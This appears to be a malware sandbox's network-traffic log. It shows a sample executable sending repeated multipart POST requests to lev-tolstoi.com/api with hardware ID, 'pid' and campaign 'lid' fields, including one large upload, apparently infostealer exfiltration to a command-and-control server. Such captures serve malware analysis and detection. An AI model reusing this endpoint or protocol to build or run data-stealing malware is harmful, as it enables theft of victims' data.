                                                                                                                                                                                                                                              2024-12-23 08:06:44 UTC253INData Raw: 32 48 4a 54 2b 56 63 6b 2b 7a 74 35 72 75 75 62 66 47 49 4a 31 76 69 36 47 6b 68 69 43 6f 6f 48 51 61 38 6b 64 41 34 35 68 4b 48 59 47 78 38 42 62 79 78 4c 47 7a 7a 32 6d 31 70 4a 4a 68 43 50 31 65 2f 2f 46 47 49 4b 32 67 64 42 72 38 78 30 56 69 6c 51 39 59 41 4f 57 68 52 62 41 4a 6f 6d 51 61 35 75 5a 67 31 75 64 62 50 46 6e 67 63 73 41 6e 4a 43 42 67 7a 33 62 43 67 43 66 63 44 4e 39 47 2b 69 4c 44 70 4e 69 6d 35 70 35 39 38 62 52 52 37 49 68 76 6e 66 2f 30 32 47 63 37 74 66 49 63 34 35 55 51 35 73 37 5a 6a 46 4e 31 64 6c 45 77 54 50 66 79 32 79 62 35 37 5a 4f 68 32 6a 75 63 61 69 45 47 4d 76 75 7a 73 68 7a 35 56 6f 4b 6a 6d 41 76 5a 77 66 47 7a 42 62 34 66 6f 6e 51 61 2f 32 5a 70 46 75 44 59 66 6c 67 72 73 5a 2f 6b 36 54 47 6d 43 7a 4c 46 55 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 2HJT+Vck+zt5ruubfGIJ1vi6GkhiCooHQa8kdA45hKHYGx8BbyxLGzz2m1pJJhCP1e//FGIK2gdBr8x0VilQ9YAOWhRbAJomQa5uZg1udbPFngcsAnJCBgz3bCgCfcDN9G+iLDpNim5p598bRR7Ihvnf/02Gc7tfIc45UQ5s7ZjFN1dlEwTPfy2yb57ZOh2jucaiEGMvuzshz5VoKjmAvZwfGzBb4fonQa/2ZpFuDYflgrsZ/k6TGmCzLFU
                                                                                                                                                                                                                                              2024-12-23 08:06:44 UTC1369INData Raw: 32 63 36 65 0d 0a 50 48 4f 7a 67 78 55 6f 57 46 46 73 4d 68 69 5a 42 37 39 34 4c 45 43 39 6f 2f 72 47 6e 78 6b 68 69 54 37 70 6e 61 5a 5a 77 49 51 39 45 37 65 58 49 59 78 4d 31 56 30 54 4f 4f 39 68 57 43 77 35 78 65 6d 6e 37 41 53 4c 69 52 56 59 4f 35 30 4d 51 2b 33 78 51 4e 6a 6d 31 2b 50 30 72 5a 69 77 37 2b 63 49 47 49 46 4f 75 5a 69 52 6a 56 4c 38 74 31 73 59 56 66 6b 37 2b 4d 72 7a 48 52 48 42 53 59 4f 33 41 78 44 4a 61 54 42 6f 6c 77 7a 64 6c 72 2f 59 6e 44 41 39 67 38 71 53 62 74 6c 42 61 63 37 74 66 49 63 34 35 55 51 35 73 37 5a 6a 46 4e 31 64 6c 45 77 54 50 66 79 32 79 62 35 37 39 66 69 32 72 35 5a 76 32 6c 55 35 47 70 67 63 5a 72 30 31 70 62 73 44 74 32 4d 54 57 59 69 30 36 48 61 49 6e 39 4b 4b 76 58 6c 6b 36 63 49 74 42 78 75 59 35 66 6c 65 7a
                                                                                                                                                                                                                                              Data Ascii: 2c6ePHOzgxUoWFFsMhiZB794LEC9o/rGnxkhiT7pnaZZwIQ9E7eXIYxM1V0TOO9hWCw5xemn7ASLiRVYO50MQ+3xQNjm1+P0rZiw7+cIGIFOuZiRjVL8t1sYVfk7+MrzHRHBSYO3AxDJaTBolwzdlr/YnDA9g8qSbtlBac7tfIc45UQ5s7ZjFN1dlEwTPfy2yb579fi2r5Zv2lU5GpgcZr01pbsDt2MTWYi06HaIn9KKvXlk6cItBxuY5flez
                                                                                                                                                                                                                                              2024-12-23 08:06:44 UTC1369INData Raw: 45 68 4e 79 57 6c 2b 4b 55 71 52 79 45 54 56 4e 73 72 65 4b 4f 4c 6e 72 33 2b 44 61 50 39 67 72 35 78 58 79 6f 44 33 71 52 58 69 44 77 43 48 64 54 6c 6e 47 35 61 46 46 73 68 77 6b 66 46 72 37 5a 6d 75 46 73 31 33 76 69 37 2f 76 6c 75 4c 6f 4d 61 65 4f 70 45 39 44 59 35 36 4b 47 45 64 32 59 52 34 38 52 47 4a 68 6d 75 6a 6d 63 6b 4b 77 79 2f 36 5a 2f 2f 54 43 4e 66 31 6c 4e 74 38 6a 45 67 63 78 32 4a 2b 5a 30 71 4f 6d 52 69 48 49 6f 6d 51 61 2b 4c 61 67 30 71 4c 62 4f 68 31 2b 4c 56 6d 6f 71 44 47 69 54 33 4d 46 77 2b 6f 65 43 39 37 4e 4f 6a 65 56 63 6b 2b 7a 74 34 36 35 5a 66 52 56 38 30 33 78 7a 62 33 79 32 66 4c 37 74 6e 49 63 35 77 76 41 49 64 31 4f 57 63 62 6d 2b 78 59 77 44 48 66 32 43 61 70 2b 4a 4a 4a 68 79 2b 77 4e 72 6e 4c 41 4e 66 67 67 59 77 36
                                                                                                                                                                                                                                              Data Ascii: EhNyWl+KUqRyETVNsreKOLnr3+DaP9gr5xXyoD3qRXiDwCHdTlnG5aFFshwkfFr7ZmuFs13vi7/vluLoMaeOpE9DY56KGEd2YR48RGJhmujmckKwy/6Z//TCNf1lNt8jEgcx2J+Z0qOmRiHIomQa+Lag0qLbOh1+LVmoqDGiT3MFw+oeC97NOjeVck+zt465ZfRV803xzb3y2fL7tnIc5wvAId1OWcbm+xYwDHf2Cap+JJJhy+wNrnLANfggYw6


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              3192.168.2.449733104.21.66.864436948C:\Users\user\Desktop\LNn56KMkEE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-23 08:06:46 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=IN3K5IA4
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 18103
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                              2024-12-23 08:06:46 UTC15331OUTData Raw: 2d 2d 49 4e 33 4b 35 49 41 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 36 35 46 33 42 39 46 30 41 41 39 30 31 37 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 4e 33 4b 35 49 41 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 4e 33 4b 35 49 41 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 49 4e 33 4b 35 49 41 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                                                                                                                                                              Data Ascii: --IN3K5IA4Content-Disposition: form-data; name="hwid"5965F3B9F0AA9017AC8923850305D13E--IN3K5IA4Content-Disposition: form-data; name="pid"2--IN3K5IA4Content-Disposition: form-data; name="lid"PsFKDg--pablo--IN3K5IA4Content-Disposit
                                                                                                                                                                                                                                              2024-12-23 08:06:46 UTC2772OUTData Raw: f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91 d7 e9 19
                                                                                                                                                                                                                                              Data Ascii: 3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{
                                                                                                                                                                                                                                              2024-12-23 08:06:47 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 08:06:47 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=p4ptbdjcdragco4cpa1khlt2dc; expires=Fri, 18 Apr 2025 01:53:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j3QJcFaCGDdzizs6EYHCLWwNt1exOtUwNdSSDOarYjXQum75X2O7ifb7c7rJlB7ePnFEOh5jbWkBHcLXd8Izb29NtkABD3HOr1hbX2un2mk56knU8vPTOTDtm6qJP0N6qhk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f66daae0a654363-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1563&rtt_var=600&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19054&delivery_rate=1801357&cwnd=237&unsent_bytes=0&cid=5e09281a89ed7d48&ts=949&x=0"
                                                                                                                                                                                                                                              2024-12-23 08:06:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                              2024-12-23 08:06:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              4192.168.2.449734104.21.66.864436948C:\Users\user\Desktop\LNn56KMkEE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-23 08:06:48 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=V2KVRS1ZQKT53LIW
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 8772
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                              2024-12-23 08:06:48 UTC8772OUTData Raw: 2d 2d 56 32 4b 56 52 53 31 5a 51 4b 54 35 33 4c 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 36 35 46 33 42 39 46 30 41 41 39 30 31 37 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 32 4b 56 52 53 31 5a 51 4b 54 35 33 4c 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 32 4b 56 52 53 31 5a 51 4b 54 35 33 4c 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 56 32
                                                                                                                                                                                                                                              Data Ascii: --V2KVRS1ZQKT53LIWContent-Disposition: form-data; name="hwid"5965F3B9F0AA9017AC8923850305D13E--V2KVRS1ZQKT53LIWContent-Disposition: form-data; name="pid"2--V2KVRS1ZQKT53LIWContent-Disposition: form-data; name="lid"PsFKDg--pablo--V2
                                                                                                                                                                                                                                              2024-12-23 08:06:49 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 08:06:49 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=1dt3n6j7tjba1qe7hjknkqg60e; expires=Fri, 18 Apr 2025 01:53:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9hZN%2Bop9WNM76NGbTSPQ7SlWlwAbJeU3bk4doLeKR2ss276Kz9ywxVW0wMfvhqSLysJvwoztypqN0rc53W0vGSlTIVUV5pVe5qwfZafP0A7uJmO1%2Bb%2Flu7C6%2FXOjxYIlDXI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f66dabc292d4273-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2415&min_rtt=2347&rtt_var=929&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2836&recv_bytes=9708&delivery_rate=1244141&cwnd=229&unsent_bytes=0&cid=d778235c36f061a6&ts=664&x=0"
                                                                                                                                                                                                                                              2024-12-23 08:06:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                              2024-12-23 08:06:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              5192.168.2.449735104.21.66.864436948C:\Users\user\Desktop\LNn56KMkEE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-23 08:06:50 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=4LYW44T8B2H
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 20395
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                              2024-12-23 08:06:50 UTC15331OUTData Raw: 2d 2d 34 4c 59 57 34 34 54 38 42 32 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 36 35 46 33 42 39 46 30 41 41 39 30 31 37 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 4c 59 57 34 34 54 38 42 32 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 4c 59 57 34 34 54 38 42 32 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 34 4c 59 57 34 34 54 38 42 32 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                              Data Ascii: --4LYW44T8B2HContent-Disposition: form-data; name="hwid"5965F3B9F0AA9017AC8923850305D13E--4LYW44T8B2HContent-Disposition: form-data; name="pid"3--4LYW44T8B2HContent-Disposition: form-data; name="lid"PsFKDg--pablo--4LYW44T8B2HCont
                                                                                                                                                                                                                                              2024-12-23 08:06:50 UTC5064OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb
                                                                                                                                                                                                                                              Data Ascii: lrQMn 64F6(X&7~`aO@
                                                                                                                                                                                                                                              2024-12-23 08:06:52 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 08:06:51 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=jvaqh508hre4kj3v1ijd9mmo8s; expires=Fri, 18 Apr 2025 01:53:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fBx3ZpKD5Poho0ZoMpMHs44BJPl22xUTAF5nBpebJBqvtKYH9Zcmuo6Lg4jNihlGtjDCcIA7lDNZQknh9nWLom1NX%2FeHiekxkDgineEaw6extgy7uhEFForZM0kgfGPJfz4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f66dac93d5943f2-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1741&rtt_var=654&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21349&delivery_rate=1673352&cwnd=207&unsent_bytes=0&cid=004fbc244ee9c71b&ts=1128&x=0"
                                                                                                                                                                                                                                              2024-12-23 08:06:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                              2024-12-23 08:06:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              6192.168.2.449737104.21.66.864436948C:\Users\user\Desktop\LNn56KMkEE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-23 08:06:53 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=C07PW8AQYBH82R
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 1233
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                              2024-12-23 08:06:53 UTC1233OUTData Raw: 2d 2d 43 30 37 50 57 38 41 51 59 42 48 38 32 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 36 35 46 33 42 39 46 30 41 41 39 30 31 37 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 43 30 37 50 57 38 41 51 59 42 48 38 32 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 30 37 50 57 38 41 51 59 42 48 38 32 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 43 30 37 50 57 38 41 51
                                                                                                                                                                                                                                              Data Ascii: --C07PW8AQYBH82RContent-Disposition: form-data; name="hwid"5965F3B9F0AA9017AC8923850305D13E--C07PW8AQYBH82RContent-Disposition: form-data; name="pid"1--C07PW8AQYBH82RContent-Disposition: form-data; name="lid"PsFKDg--pablo--C07PW8AQ
                                                                                                                                                                                                                                              2024-12-23 08:06:54 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 08:06:54 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=c8cp4nr0eckciv8opgdk3o1llj; expires=Fri, 18 Apr 2025 01:53:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WQFSpwR0cwnqGFD8Pgug54uElLrIF4cWXhdy%2BGrZ3V1HKnR%2FT1UhwIMzDfrgg%2BOPxMegS1%2Ff3uVnAaRGlpTWFlo1%2FYidcAVRiPuTtm8xh%2B17RfRvHeUS6siv49ofKnXl%2F1g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f66dadabbd1c341-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1501&min_rtt=1492&rtt_var=578&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2145&delivery_rate=1861057&cwnd=177&unsent_bytes=0&cid=d33acdd429bd0197&ts=831&x=0"
                                                                                                                                                                                                                                              2024-12-23 08:06:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                              2024-12-23 08:06:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              7192.168.2.449739104.21.66.864436948C:\Users\user\Desktop\LNn56KMkEE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-23 08:06:56 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=83ZR4JYWYD19B9Z
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 568739
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                              2024-12-23 08:06:56 UTC15331OUTData Raw: 2d 2d 38 33 5a 52 34 4a 59 57 59 44 31 39 42 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 36 35 46 33 42 39 46 30 41 41 39 30 31 37 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 38 33 5a 52 34 4a 59 57 59 44 31 39 42 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 33 5a 52 34 4a 59 57 59 44 31 39 42 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 38 33 5a 52 34
